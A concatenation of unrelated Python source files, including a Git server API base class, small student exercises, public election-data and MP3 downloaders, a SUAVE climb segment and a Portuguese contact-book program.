STATUS_JOB_STARTED = 0
STATUS_JOB_COMPLETE = 1
STATUS_START_RUNNING = 2
STATUS_CONTINUE_RUNNING = 3
def __init__(self, config, access_user=None, token=None):
super(GitAPI, self).__init__()
self._config = config
self._access_user = access_user
self._token = token
self._request_timeout = config.get("request_timeout", 5)
self._install_webhook = config.get("install_webhook", False)
self._update_remote = config.get("remote_update", False)
self._remove_pr_labels = config.get("remove_pr_label_prefix", [])
self._ssl_cert = config.get("ssl_cert", True)
self._civet_url = config.get("civet_base_url", "")
self._headers = {"User-Agent": "INL-CIVET/1.0 (+https://github.com/idaholab/civet)"}
self._errors = []
self._per_page = 50
self._per_page_key = "per_page"
self._default_params = {}
self._get_params = {}
self._bad_response = False
self._session = None
def _timeout(self, timeout):
"""
Utility function to get the timeout value used in requests
"""
if timeout is None:
return self._request_timeout
return timeout
def _response_to_str(self, response):
return "Status code: %s\nReason: %s\nJSON response:\n%s" % \
(response.status_code, response.reason, self._format_json(response.json()))
def _format_json(self, data):
return json.dumps(data, indent=2)
def _params(self, params, get=False):
"""
Concatenates all the available parameters into a single dictionary
"""
if params is None:
return self._default_params
if isinstance(params, dict):
params.update(self._default_params)
if get:
params.update(self._get_params)
return params
def errors(self):
return self._errors
def _response_exception(self, url, method, e, data=None, params=None):
data_str = ""
if not data:
data_str = "Sent data:\n%s\n" % self._format_json(data)
param_str = ""
if not params:
param_str = "Sent params:\n%s\n" % self._format_json(params)
msg = "Response exception:\nURL: %s\nMETHOD: %s\n%s%sError: %s" % (
url, method, param_str, data_str, e)
self._add_error(msg)
self._bad_response = True
def _add_error(self, err_str, log=True):
"""
Adds an error string to the internal list of errors and log it.
"""
self._errors.append(err_str)
if log:
logger.warning(err_str)
def _check_response(self, response, params={}, data={}, log=True):
try:
response.raise_for_status()
except Exception as e:
params_str = ""
if params:
params_str = "Params:\n%s\n" % self._format_json(params)
data_str = ""
if data:
data_str = "Data:\n%s\n" % self._format_json(data)
headers = ""
if self._headers:
headers = "Headers:\n%s\n" % self._format_json(self._headers)
self._add_error("Bad response %s\nURL: %s\nMETHOD: %s\n%s%s%s%s\n%s\n%s"
% ("-"*50,
response.request.url,
response.request.method,
params_str,
data_str,
headers,
self._response_to_str(response),
e,
"-"*50),
log)
self._bad_response = True
return response
def get(self, url, params=None, timeout=None, log=True):
"""
Get the URL.
Input:
url[str]: URL to get
params[dict]: Dictionary of extra parameters to send in the request
timeout[int]: Specify a timeout other than the default.
Return:
requests.Reponse or None if there was a requests exception
"""
self._bad_response = False
try:
timeout = self._timeout(timeout)
params = self._params(params, True)
response = self._session.get(url,
params=params, timeout=timeout, headers=self._headers, verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "GET", e, params=params)
return self._check_response(response, params=params, log=log)
def post(self, url, params=None, data=None, timeout=None, log=True):
"""
Post to a URL.
Input:
url[str]: URL to POST to.
data[dict]: Dictionary of data to post
timeout[int]: Specify a timeout other than the default.
Return:
requests.Reponse or None if there was a requests exception
"""
self._bad_response = False
try:
timeout = self._timeout(timeout)
params = self._params(params)
response = self._session.post(url,
params=params,
json=data,
timeout=timeout,
headers=self._headers,
verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "POST", e, data=data, params=params)
return self._check_response(response, params=params, data=data, log=log)
def patch(self, url, params=None, data=None, timeout=None, log=True):
"""
Patch a URL.
Input:
url[str]: URL to PATCH
timeout[int]: Specify a timeout other than the default.
Return:
requests.Reponse or None if there was any problems
"""
self._bad_response = False
params = self._params(params)
try:
timeout = self._timeout(timeout)
response = self._session.patch(url,
params=params,
json=data,
timeout=timeout,
headers=self._headers,
verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "PATCH", e, data=data, params=params)
return self._check_response(response, params, data, log)
def put(self, url, params=None, data=None, timeout=None, log=True):
"""
Do a Put on a URL.
Input:
url[str]: URL to PATCH
timeout[int]: Specify a timeout other than the default.
Return:
requests.Reponse or None if there was any problems
"""
self._bad_response = False
params = self._params(params)
try:
timeout = self._timeout(timeout)
response = self._session.put(url,
params=params,
json=data,
timeout=timeout,
headers=self._headers,
verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "PUT", e, data=data, params=params)
return self._check_response(response, params, data, log)
def delete(self, url, timeout=None, log=True):
"""
Delete a URL.
Input:
url[str]: URL to DELETE
timeout[int]: Specify a timeout other than the default.
Return:
requests.Reponse or None if there was any problems
"""
self._bad_response = False
try:
timeout = self._timeout(timeout)
response = self._session.delete(url,
params=self._default_params,
timeout=timeout,
headers=self._headers,
verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "DELETE", e, params=self._default_params)
return self._check_response(response, self._default_params, log=log)
def get_all_pages(self, url, params=None, timeout=None, log=True):
"""
Get all the pages for a URL by following the "next" links on a response.
Input:
url[str]: URL to get
params[dict]: Dictionary of extra parameters to send in the request
timeout[int]: Specify a timeout other than the default.
Return:
list: List ofor None if there was any problems
"""
if params is None:
params = {}
params[self._per_page_key] = self._per_page
response = self.get(url, params=params, timeout=timeout, log=log)
if response is None or self._bad_response:
return None
all_json = response.json()
try:
while 'next' in response.links:
response = self.get(response.links["next"]["url"],
params=params, timeout=timeout, log=log)
if not self._bad_response and response:
all_json.extend(response.json())
else:
break
except Exception as e:
self._add_error("Error getting multiple pages at %s\nSent data:\n%s\nError: %s" % (
url, self._format_json(params), e), log)
return all_json
@abc.abstractmethod
def sign_in_url(self):
"""
Gets the URL to allow the user to sign in.
Return:
str: URL
"""
@abc.abstractmethod
def get_all_repos(self, owner):
"""
Get a list of repositories the user has access to
Input:
owner[str]: user to check against
Return:
list[str]: Each entry is "<owner>/<repo name>"
"""
@abc.abstractmethod
def get_repos(self, session):
"""
Get a list of repositories that the signed in user has access to.
Input:
session[HttpRequest.session]: session of the request. Used as a cache of the repositories.
Return:
list[str]: Each entry is "<owner>/<repo name>"
"""
@abc.abstractmethod
def get_branches(self, owner, repo):
"""
Get a list of branches for a repository
Input:
owner[str]: owner of the repository
repo[str]: name of the repository
Return:
list[str]: Each entry is the name of a branch
"""
@abc.abstractmethod
def update_pr_status(self, base, head, state, event_url, description, context, job_stage):
"""
Update the PR status.
Input:
base[models.Commit]: Original commit
head[models.Commit]: New commit
state[int]: One of the states defined as class variables above
event_url[str]: URL back to the moosebuild page
descriptionstr]: Description of the update
context[str]: Context for the update
job_stage[int]: One of the STATUS_* flags
"""
@abc.abstractmethod
def is_collaborator(self, user, repo):
"""
Check to see if the signed in user is a collaborator on a repo
Input:
user[models.GitUser]: User to check against
repo[models.Repository]: Repository to check against
Return:
bool: True if user is a collaborator on repo, False otherwise
"""
@abc.abstractmethod
def pr_review_comment(self, url, sha, filepath, position, msg):
"""
Leave a review comment on a PR for a specific hash, on a specific position of a file
Input:
url[str]: URL to post the message to
sha[str]: SHA of the PR branch to attach the message to
filepath[str]: Filepath of the file to attach the message to
position[str]: Position in the diff to attach the message to
msg[str]: Comment
"""
@abc.abstractmethod
def pr_comment(self, url, msg):
"""
Leave a comment on a PR
Input:
url[str]: URL to post the message to
msg[str]: Comment
"""
@abc.abstractmethod
def last_sha(self, owner, repo, branch):
"""
Get the latest SHA for a branch
Input:
owner[str]: owner of the repository
repo[str]: name of the repository
branch[str]: name of the branch
Return:
str: Last SHA of the branch or None if there was a problem
"""
@abc.abstractmethod
def install_webhooks(self, user, repo):
"""
Updates the webhook for this server on GitHub.
Input:
user[models.GitUser]: the user trying to update the web hooks.
repo[models.Repository]: the repository to set the web hook on.
Raises:
GitException if there are any errors.
"""
@abc.abstractmethod
def repo_html_url(self, owner, repo):
"""
Gets a URL to the repository
Input:
owner[str]: Owner of the repo
repo[str]: Name of the repo
Return:
str: URL on the gitserver to the repo
"""
@abc.abstractmethod
def branch_html_url(self, owner, repo, branch):
"""
Gets a URL to the branch
Input:
owner[str]: Owner of the repo
repo[str]: Name of the repo
branch[str]: Name of the branch
Return:
str: URL on the gitserver to the branch
"""
@abc.abstractmethod
def commit_html_url(self, owner, repo, sha):
"""
Gets a URL to a commit
Input:
owner: str: Owner of the repo
repo: str: Name of the repo
sha: str: SHA of on the repo
Return:
str: URL on the gitserver to the commit
"""
@abc.abstractmethod
def add_pr_label(self, repo, pr_num, label_name):
"""
Add a label to a PR
Input:
repo[models.Repository]: Repository of the PR
pr_num[int]: PR number
label_name[str]: Text of the label
"""
@abc.abstractmethod
def remove_pr_label(self, repo, pr_num, label_name):
"""
Remove a label from a PR
Input:
builduser[models.GitUser]: User that will actually attach the label
repo[models.Repository]: Repository of the PR
pr_num[int]: PR number
label_name[str]: Text of the label
"""
@abc.abstractmethod
def get_pr_comments(self, url, username, comment_re):
"""
Get a list of comments authoried by a user that matches a regular expression.
Input:
url[str]: URL to get comments from
username[str]: Username that authored comments
comment_re[str]: Regular expression to match against the body of comments
Return:
list[dict]: Comments
"""
@abc.abstractmethod
def remove_pr_comment(self, comment):
"""
Remove a comment on a PR
Input:
comment[dict]: Git server information as returned by get_pr_comments()
"""
@abc.abstractmethod
def edit_pr_comment(self, comment, msg):
"""
Edit an existing comment on a PR
Input:
comment[dict]: Git server information as returned by get_pr_comments()
msg[str]: New comment body
"""
@abc.abstractmethod
def is_member(self, team, user):
"""
Checks to see if a user is a member of a team/org/group
Input:
team[str]: Name of the team/org/group
user[models.GitUser]: User to check
"""
@abc.abstractmethod
def get_open_prs(self, owner, repo):
"""
Get a list of open PRs for a repo
Input:
owner[str]: owner name
repo[str]: repo name
Return:
list[dict]: None can be returned on error.
Each dict will have the following key/value pairs:
number[int]: PR number
title[str]: Title of the PR
html_url[str]: URL to the PR
"""
@abc.abstractmethod
def create_or_update_issue(self, owenr, repo, title, body, new_comment):
"""
If an open issue with the given title exists, then update it.
Otherwise create a new issue.
The issue will be created by the user that created the GitAPI.
Input:
owner[str]: owner of the repository to create/update the issue on
repo[str]: repository to create/update the issue on
title[str]: title of issue
body[str]: body of issue
new_comment[bool]: If true, create a new comment. Else just update the issue body
"""
@abc.abstractmethod
def automerge(self, repo, pr_num):
"""
See if a PR can be automerged.
Input:
repo[models.Repository]: repository to create/update the issue on
pr_num[str]: Number of the PR
"""
|
#--- Exercício 3 - Funções - 1
#--- Crie uma função que leia três números float
#--- Armazene cada valor lido em uma variável
#--- Calcule a média entre os três números e armazene em uma quarta variável
#--- Imprima a média e uma mensagem usando f-string (módulo 3)
#--- Deve ser impresso apenas duas cadas após a vírgula
n1 = ''
n2 = ''
n3 = ''
med = '0'
def media(n1,n2,n3,med):
n1 = float(input('Informe o 1 Número'))
n2 = float(input('Informe o 2 Número'))
n3 = float(input('Informe o 3 Número'))
med = (n1+n2+n3)/3
return print(f'A média entre {n1} , {n2} e {n3} é: {med}')
media (n1,n2,n3,med)
|
import requests
# We have to define our own download function using requests, as simple
# urlretrieve is blocked by server :(
def urlretrieve(url, filename):
r = requests.get(url)
with open(filename, "wb") as f:
f.write(r.content)
def download_election_results():
# Kreiswahl
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534000/html5/Open-Data-Kreiswahl-Hessen3021.csv",
"data/kreiswahl_gesamt.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534000/html5/Open-Data-Kreiswahl-Hessen3023.csv",
"data/kreiswahl_gemeinden.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534000/html5/OpenDataInfo.html",
"data/beschreibung_kreiswahl.html")
# Stadtverordnetenwahl Marburg
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534014/html5/Open-Data-Gemeindewahl-Hessen3033.csv",
"data/stv_marburg_gesamt.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534014/html5/Open-Data-Gemeindewahl-Hessen3038.csv",
"data/stv_marburg_ortsbezirke.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534014/html5/Open-Data-Gemeindewahl-Hessen3036.csv",
"data/stv_marburg_wahlbezirke.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534014/html5/OpenDataInfo.html",
"data/beschreibung_stv_marburg.html")
if __name__ == "__main__":
download_election_results()
|
# pandastrick4.py
import pandas as pd
weekly_data = {'day':['Monday','Tuesday', 'Wednesday', 'Thursday',
'Friday', 'Saturday', 'Sunday'],
'temp':[40, 33, 42, 31, 41, 40, 30],
'condition':['Sunny','Cloudy','Sunny','Rainy','Sunny',
'Cloudy','Rainy']
}
df = pd.DataFrame(weekly_data)
print(df[(df.condition == 'Rainy') | (df.condition == 'Sunny')])
print(df[df['condition'].str.contains('Rainy|Sunny')])
|
import dataclasses
from typing import Any, Optional, Union
class TaskType:
ASSET_PURCHASE_REQUEST_PROCESSING = 'asset_purchase_request_processing'
ASSET_CHANGE_REQUEST_PROCESSING = 'asset_change_request_processing'
ASSET_SUSPEND_REQUEST_PROCESSING = 'asset_suspend_request_processing'
ASSET_RESUME_REQUEST_PROCESSING = 'asset_resume_request_processing'
ASSET_CANCEL_REQUEST_PROCESSING = 'asset_cancel_request_processing'
ASSET_ADJUSTMENT_REQUEST_PROCESSING = 'asset_adjustment_request_processing'
ASSET_PURCHASE_REQUEST_VALIDATION = 'asset_purchase_request_validation'
ASSET_CHANGE_REQUEST_VALIDATION = 'asset_change_request_validation'
ASSET_SUSPEND_REQUEST_VALIDATION = 'asset_suspend_request_validation'
ASSET_RESUME_REQUEST_VALIDATION = 'asset_resume_request_validation'
ASSET_CANCEL_REQUEST_VALIDATION = 'asset_cancel_request_validation'
ASSET_ADJUSTMENT_REQUEST_VALIDATION = 'asset_adjustment_request_validation'
PRODUCT_ACTION_EXECUTION = 'product_action_execution'
PRODUCT_CUSTOM_EVENT_PROCESSING = 'product_custom_event_processing'
TIER_CONFIG_SETUP_REQUEST_PROCESSING = 'tier_config_setup_request_processing'
TIER_CONFIG_CHANGE_REQUEST_PROCESSING = 'tier_config_change_request_processing'
TIER_CONFIG_ADJUSTMENT_REQUEST_PROCESSING = 'tier_config_adjustment_request_processing'
TIER_CONFIG_SETUP_REQUEST_VALIDATION = 'tier_config_setup_request_validation'
TIER_CONFIG_CHANGE_REQUEST_VALIDATION = 'tier_config_change_request_validation'
TIER_CONFIG_ADJUSTMENT_REQUEST_VALIDATION = 'tier_config_adjustment_request_validation'
class MessageType:
CAPABILITIES = 'capabilities'
CONFIGURATION = 'configuration'
TASK = 'task'
PAUSE = 'pause'
RESUME = 'resume'
SHUTDOWN = 'shutdown'
class TaskCategory:
BACKGROUND = 'background'
INTERACTIVE = 'interactive'
class ResultType:
SUCCESS = 'success'
RESCHEDULE = 'reschedule'
SKIP = 'skip'
RETRY = 'retry'
FAIL = 'fail'
@dataclasses.dataclass
class TaskPayload:
task_id: str
task_category: str
task_type: str
object_id: str
result: str = None
data: Any = None
countdown: int = 0
failure_output: str = None
correlation_id: str = None
reply_to: str = None
def to_json(self):
return dataclasses.asdict(self)
@dataclasses.dataclass
class ConfigurationPayload:
configuration: dict = None
logging_api_key: str = None
def to_json(self):
return dataclasses.asdict(self)
@dataclasses.dataclass
class CapabilitiesPayload:
capabilities: dict
readme_url: str = None
changelog_url: str = None
def to_json(self):
return dataclasses.asdict(self)
@dataclasses.dataclass(init=False)
class Message:
message_type: str
data: Optional[Union[CapabilitiesPayload, ConfigurationPayload, TaskPayload]] = None
def __init__(self, message_type=None, data=None):
self.message_type = message_type
if isinstance(data, dict):
if self.message_type == MessageType.CONFIGURATION:
self.data = ConfigurationPayload(**data)
elif self.message_type == MessageType.TASK:
self.data = TaskPayload(**data)
elif self.message_type == MessageType.CAPABILITIES:
self.data = CapabilitiesPayload(**data)
else:
self.data = data
def to_json(self):
payload = {'message_type': self.message_type}
if self.data:
payload['data'] = dataclasses.asdict(self.data)
return payload
|
from application.src.db.interface import DBInterface
class Countries(DBInterface):
display_table_name = "countries";
class Continents(DBInterface):
display_table_name = "continents";
|
import json
class TiledImport:
def __init__(self):
self.width = 0
self.height = 0
self.layers = []
@property
def num_layers(self):
return len(self.layers)
def load(self, filename):
with open(filename) as fp:
data = json.load(fp)
self.layers = [l["data"] for l in sorted(data["layers"], key=lambda l: l["name"])]
self.width = data["width"]
self.height = data["height"]
if __name__ == "__main__":
t = TiledImport()
t.load("./assets/tiled/level01.json")
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014 eNovance Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class ToozError(Exception):
"""Exception raised when an internal error occurs.
Raised for instance in case of server internal error.
:ivar cause: the cause of the exception being raised, when not none this
will itself be an exception instance, this is useful for
creating a chain of exceptions for versions of python where
this is not yet implemented/supported natively.
"""
def __init__(self, message, cause=None):
super(ToozError, self).__init__(message)
self.cause = cause
class NotImplemented(NotImplementedError, ToozError):
pass
|
#! /usr/bin/python
# coding=UTF-8
"""
Fetches the MP3 files from playingthechanges.com to import into iTunes.
Author: Mike Bland (mbland@acm.org)
http://mike-bland.com/
Date: 2014-03-13
License: Creative Commons Attribution 4.0 International (CC By 4.0)
http://creativecommons.org/licenses/by/4.0/deed.en_US
Grabs all the MP3 links from the http://playingthechanges.com/ page and
downloads each file into the current directory, then updates the tag info for
each MP3.
If you don't have the requests module installed, you may need to
install pip, the Python Package Index installer:
https://pypi.python.org/pypi
http://www.pip-installer.org/en/latest/installing.html
Then:
$ sudo pip install requests
Requires the id3lib tools. For OS X, install Homebrew: http://brew.sh/
Then:
$ brew install id3lib
Written with hints from:
http://ubuntuforums.org/showthread.php?t=1542894
http://docs.python-requests.org/en/latest/user/quickstart/
More info:
http://mike-bland.com/2014/03/17/playing-the-changes-hack-continued.html
"""
import contextlib
import os
import os.path
import re
import requests
import subprocess
import sys
PTC_COM='http://www.playingthechanges.com'
ROOT_WEIGHTS = {
'C': 0,
'F': 1,
'Bb': 2,
'Eb': 3,
'Ab': 4,
'Db': 5,
'Fsharp': 6,
'B': 7,
'E': 8,
'A': 9,
'D': 10,
'G': 11,
}
SUFFIX_WEIGHTS = {
'Maj7': 0,
'min7': 1,
'7': 2,
'min7b5': 3,
'7b9b13': 4,
'7b913': 5,
}
# I'd intended to use the proper unicode flat (U+266D) and sharp (U+266F),
# but iTunes doesn't grok them.
ROOT_REWRITES = {
'C': 'C',
'F': 'F',
'Bb': 'Bb',
'Eb': 'Eb',
'Ab': 'Ab',
'Db': 'Db',
'Fsharp': 'F#',
'B': 'B',
'E': 'E',
'A': 'A',
'D': 'D',
'G': 'G',
}
SUFFIX_REWRITES = {
'Maj7': 'Maj7',
'min7': '-7',
'7': '7',
'min7b5': '-7(b5)',
'7b9b13': '7(b9,b13)',
'7b913': '7(b9,13)',
}
def FetchPtcFiles():
"""Scrapes and fetches the list of MP3 files from playingthechanges.com."""
with contextlib.closing(requests.get('%s/' % PTC_COM)) as index_page:
mp3_links = re.findall('downloads/.*\.mp3', index_page.text)
for i, link in enumerate(mp3_links):
print 'Fetching %2d of %d: %s' % (i + 1, len(mp3_links), link)
with contextlib.closing(requests.get('%s/%s' % (PTC_COM, link))) as mp3:
with open(os.path.basename(link), 'wb') as fd:
for chunk in mp3.iter_content(1<<20):
fd.write(chunk)
class BadChordFileNameException(Exception):
"""Raised when a chord file name does not match the expected format."""
pass
def SplitFileName(file_name):
"""Returns the tuple (root, suffix) based on a chord's file name.
Args:
file_name: corresponds to a chord file from playingthechanges.com
Returns:
a (chord root, chord suffix) tuple
Raises:
BadChordFileNameException: if the file does not end with .mp3 or if either
the chord root or chord suffix does not correspond to an expected value
within ROOT_WEIGHTS and SUFFIX_WEIGHTS, respectively
"""
kMp3Suffix = '.mp3'
if not file_name.endswith(kMp3Suffix):
raise BadChordFileNameException('Bad chord file name: %s' % file_name)
suffix_start = 1
if file_name[1] == 'b':
suffix_start = 2
elif file_name.startswith('sharp', 1):
suffix_start = 6
root = file_name[:suffix_start]
suffix = file_name[suffix_start:-len(kMp3Suffix)]
if root not in ROOT_WEIGHTS:
raise BadChordFileNameException('Unknown chord root in file name: %s' %
file_name)
if suffix not in SUFFIX_WEIGHTS:
raise BadChordFileNameException('Unknown chord suffix in file name: %s' %
file_name)
return (root, suffix)
def CompareChordFileNames(lhs, rhs):
"""Defines an ordering for split chord file names.
Suffix order weight trumps root order. Root order is defined by walking the
circle of fourths up from C. Both are defined in ROOT_WEIGHTS and
SUFFIX_WEIGHTS.
Args:
lhs: left-hand tuple of (root, suffix)
rhs: right-hand tuple of (root, suffix)
Returns:
-1 if lhs < rhs
0 if lhs == rhs
1 if lhs > rhs
"""
return (cmp(SUFFIX_WEIGHTS[lhs[1]], SUFFIX_WEIGHTS[rhs[1]]) or
cmp(ROOT_WEIGHTS[lhs[0]], ROOT_WEIGHTS[rhs[0]]))
def ChordName(file_name):
"""Generates the chord name from the (root, suffix) file name tuple."""
return u'%s%s' % (ROOT_REWRITES[file_name[0]], SUFFIX_REWRITES[file_name[1]])
def UpdateMp3Tags():
mp3s = [SplitFileName(i) for i in os.listdir('.') if i.endswith('.mp3')]
mp3s.sort(CompareChordFileNames)
for i, mp3 in enumerate(mp3s):
mp3_file = '%s%s.mp3' % mp3
print 'Updating: %s' % mp3_file
command = ['/usr/local/bin/id3tag',
'--artist=Paul Del Nero',
'--album=Playing the Changes',
'--song=%s' % ChordName(mp3),
'--track=%d' % (i + 1),
'--total=%d' % len(mp3s),
mp3_file]
return_code = subprocess.call(command)
if return_code:
print >> sys.stderr, ('Error updating %s (return code %d) with '
'command: %s' % (mp3_file, return_code, ' '.join(command)))
sys.exit(return_code)
print "Updated %d mp3%s" % (len(mp3s), len(mp3s) != 1 and 's' or '')
if __name__ == '__main__':
FetchPtcFiles()
UpdateMp3Tags()
|
nums ={
1: "one",
2: "two",
3: "three",
}
print(1 in nums)
print("three" in nums)
print(4 not in nums)
|
## @ingroup Analyses-Mission-Segments-Climb
# Constant_CAS_Constant_Rate.py
#
# Created: Nov 2020, S. Karpuk
# Modified: Aug 2021, J. Mukhopadhaya
#
# Adapted from Constant_CAS_Constant_Rate
# ----------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------
# SUAVE imports
from SUAVE.Methods.Missions import Segments as Methods
from .Unknown_Throttle import Unknown_Throttle
# Units
from SUAVE.Core import Units
# ----------------------------------------------------------------------
# Segment
# ----------------------------------------------------------------------
## @ingroup Analyses-Mission-Segments-Climb
class Constant_CAS_Constant_Rate(Unknown_Throttle):
""" Climb at a constant Calibrated Airspeed (CAS) at a constant rate.
Assumptions:
None
Source:
None
"""
def __defaults__(self):
""" This sets the default solver flow. Anything in here can be modified after initializing a segment.
Assumptions:
None
Source:
N/A
Inputs:
None
Outputs:
None
Properties Used:
None
"""
# --------------------------------------------------------------
# User inputs
# --------------------------------------------------------------
self.altitude_start = None # Optional
self.altitude_end = 10. * Units.km
self.climb_rate = 3. * Units.m / Units.s
self.calibrated_air_speed = 100 * Units.m / Units.s
# --------------------------------------------------------------
# The Solving Process
# --------------------------------------------------------------
initialize = self.process.initialize
initialize.conditions = Methods.Climb.Constant_CAS_Constant_Rate.initialize_conditions
self.process.initialize = initialize
return
|
# -*- coding: utf-8 -*-
#NOME: Nivan José dos Santos Junior
#RA:
#CURSO: Engenharia de Software
#SEMESTRE: 2°
import time
import re
class Agenda(object):
#__INIT__ É CONSIDERADO A "PORTA DE ENTRADA" DE UMA CLASSE. ONDE SÃO INSERIDOS AS VARIAVEIS QUE TERÃO ESCOPO GERAL.
def __init__(self):
self.lista = []
self.ID = 0
self.contato = {}
self.inicio()
#ESTRUTURA DO PEDIDO DE OUTPUT
@property
def DADOS_INPUT(self):
print("*" * 30)
self.nome = str(raw_input("Digite o nome: ")).lower()
if len(self.lista) > 0:
for self.contato in self.lista:
while True:
if self.contato["nome"] == self.nome:
print("Esse nome já existe!")
self.nome = str(raw_input("Digite o nome: ")).lower()
else:
break
else:
pass
self.contato = {
"ID": self.ID + 1,
"nome": self.nome,
"email": str(raw_input("Digite o email:")).lower(),
"telefone": str(raw_input("Digite o telefone: ")).lower(),
"instagram": str(raw_input("Digite o instagram: ")).lower(),
"facebook": str(raw_input("Digite o Facebook: ")).lower()
}
return self
def MODIFICA_INPUT(self, nome):
for self.contato in self.lista:
print("=" * 30)
print("-" * 30)
while True:
if nome == self.contato["nome"]:
self.contato["nome"] = str(raw_input("Digite o novo nome: ")).lower()
self.contato["email"] = str(raw_input("Digite o novo email:")).lower()
self.contato["telefone"] = str(raw_input("Digite o novo telefone: ")).lower()
self.contato["instagram"] = str(raw_input("Digite o novo instagram: ")).lower()
self.contato["facebook"] = str(raw_input("Digite o novo Facebook: ")).lower()
self.ESTRUTURA_OUTPUT()
print("Modificado!")
break
else:
print("Não existe esse contato.")
break
#ESTRUTURA DO QUE SERÁ VISTO.
def ESTRUTURA_OUTPUT(self):
print("=" * 30)
print("ID: {}".format(self.contato["ID"]))
print("-" * 30)
print("\tNome: {}".format(self.contato["nome"]))
print("\tEmail: {}".format(self.contato["email"]))
print("\tTelefone: {}".format(self.contato["telefone"]))
print("\tInstagram: {}".format(self.contato["instagram"]))
print("\tFacebook: {}".format(self.contato["facebook"]))
print("=" * 30)
#VERIFICAÇÃO SE JÁ EXISTE CERTOS DADOS.
#EM CONSTRUÇÃO
def verifica_dado(self, dado):
if len(self.lista) > 0:
for self.contato in self.lista:
if self.contato[dado] == self.nome:
return False
return True
#AQUI INTEGRA OS DICIONÁRIOS À LISTA
@property
def manipular_dados(self):
return self.lista.append(self.contato)
#ALGORITMO PARA GERAR O NOME DO ARQUIVO
@property
def gerar_nome_arquivo(self):
arquivo = raw_input("Digite o nome do seu arquivo.")
formato = raw_input("Digite o formato. .txt ou .csv?")
out = re.sub(r'[^\w\s+$]', '', arquivo)
out2 = re.sub(r'[^\w\s+$]', '', formato)
self.nome_arquivo = str("{}.{}".format(out, out2))
return self
#CASO NÃO HAJA UM ARQUIVO, AQUI É POSSIVEL CRIAR, INCLUINDO A DECLARAÇÃO DO NOME DO ARQUIVO
def criar_arquivo(self):
self.gerar_nome_arquivo
print("COMO FICOU O NOME DO ARQUIVO:")
print(self.nome_arquivo)
time.sleep(2)
open(str(self.nome_arquivo), "a")
print("ARQUIVO CRIADO!")
self.start_agenda()
#AQUI LE O ARQUIVO EXTERNO
def ler_arquivo(self):
arquivo = open("agenda.txt", 'r')
try:
for self.lista in arquivo.readlines():
coluna = self.lista.strip().split(",")
self.contato = {
"ID": coluna[0],
"nome": coluna[1],
"email": coluna[2],
"telefone": coluna[3]
}
arquivo.close()
except:
pass
print(self.lista)
#FAZ O LAYOUT DA LISTA QUE SERÁ MOSTRADA AQUI.
#PARA NÃO MOSTRAR APENAS SIMPLES LISTAS E DICTS.
def mostrar_lista(self):
if len(self.lista) > 0:
for index, self.contato in enumerate(self.lista):
print("\n")
print("=" * 30)
self.ESTRUTURA_OUTPUT()
print("")
time.sleep(0.2)
print("Quantidade de contatos: {}\n".format(len(self.lista)))
else:
print("Não existe nenhum contato cadastrado para listar.\n")
#SALVA OS CONTATOS NUM ARQUIVO EXTERNO
def salvar_contatos(self):
arquivo = open("agenda.txt", "w")
for self.contato in self.lista:
arquivo.write("{},{},{},{}\t".format(
self.contato["ID"],
self.contato["nome"],
self.contato["email"],
self.contato["telefone"]))
#BUSCA POR MEIO DO NOME ALGUM INDICE DA LISTA, QUE RETORNA UM DICIONÁRIO
def buscar_contato(self):
if len(self.lista) > 0:
print("-_" * 10 + " Buscar ou Excluir Contato " + "-_" * 10)
nome = str(raw_input("Digite o nome do contato a ser encontrado: \n")).lower()
for self.contato in self.lista:
if self.contato["nome"] == nome:
self.ESTRUTURA_OUTPUT()
option = str(raw_input("Você deseja modificar? S ou N")).upper()
if option == "S":
self.MODIFICA_INPUT(nome)
else:
pass
else:
pass
#print("Não existe esse contato.")
else:
print("Não há registros. Ainda.")
time.sleep(1)
self.start_agenda()
return self
#UM DOS CAMINHOS DO METODO_EXCLUIR
def excluir_dados(self):
option = str(raw_input("Você tem certeza? S ou N")).upper()
if option == "S":
if len(self.lista) > 0:
print("EXCLUIR TODOS OS DADOS!")
del self.lista
self.lista = []
self.contato = {}
time.sleep(1)
self.start_agenda()
else:
print("Não tem nada para excluir.")
print("Adicione algo.")
option2 = str(raw_input("Deseja criar os primeiros contatos da sua agenda? S ou N")).upper()
if option2 == "S":
print("=" * 60)
self.criar_contato()
elif option == "N":
print("Ufa. Achei que tu tava ficando doido.")
self.start_agenda()
else:
print("COLOQUE DIREITO OS DADOS!")
#UM DOS CAMINHOS DO METODO_EXCLUIR
def excluir_dado(self):
print("EXCLUIR UM DADO!")
print("DISPONIVEIS PARA EXCLUSÃO: {} CONTATOS.".format(self.ID))
while True:
if self.ID > 0:
print("*" * 30 + " Excluir um Contato " + "*" * 30)
while True:
for self.contato in self.lista:
nome = str(raw_input("Digite o nome do contato a ser encontrado: ")).lower()
if self.contato["nome"] == nome:
i = self.contato["ID"] - 1
print(self.ID)
self.ESTRUTURA_OUTPUT()
option = str(raw_input("Você tem certeza que deseja excluir?")).upper()
if option == "S":
while True:
try:
lista = len(self.lista) - 1
del self.lista[i]
if len(self.lista) <= 1:
print("Um foi excluido. {} contato disponivel.".format(lista))
break
else:
print("Um foi excluido. {} contatos disponiveis.".format(lista))
break
except IndexError:
print("Não existe mais contatos.")
break
self.start_agenda()
else:
break
else:
print("Esse nome não existe na Agenda.")
option2 = str(raw_input("Deseja tentar de novo? S ou N")).upper()
if option2 == 'N':
break
self.start_agenda()
else:
break
